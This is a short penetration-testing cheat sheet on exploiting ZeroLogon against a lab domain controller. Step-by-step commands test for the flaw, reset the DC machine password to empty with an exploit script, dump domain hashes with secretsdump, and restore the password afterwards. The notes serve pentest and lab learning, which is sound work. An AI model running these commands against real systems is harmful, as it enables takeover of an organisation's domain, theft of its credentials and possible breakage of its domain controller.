Abusing ZeroLogon


  • Attacking DC and setting pass to null and taking over DC CAREFUL COULD DESTROY DC

  • Check priorly if the target is vulnerable Note: Useful for a pentest to mention to the customer that they are vulnerable without actually doing the exploitation

    └─# python3 zerologon_tester.py HYDRA-DC
    Performing authentication attempts...
    Success! DC can be fully compromised by a Zerologon attack.
  • Changing the password to empty string: python3 exploit.py HYDRA-DC

  • Check if it worked: secretsdump.py -just-dc DOMAIN/DOMAIN-CONTROLLER\$@IP-OF-DC Example: secretsdump.py -just-dc MARVEL/HYDRA-DC\$@

  • If we were able to dump hashes without typing password it means we owned the DC.

  • Restore the machine

    • Use the admin hash to get the plain_password_hex secretsdump.py administrator@ -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

    • Restore the password python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip -hexpass <Put here the hexpass you just got> The console should print Change password OK

  • There is also another way to exploit zerologon without resetting the DC password, check out Dirk-Jan Mollema's article about this

Zerologon - Resources

Last updated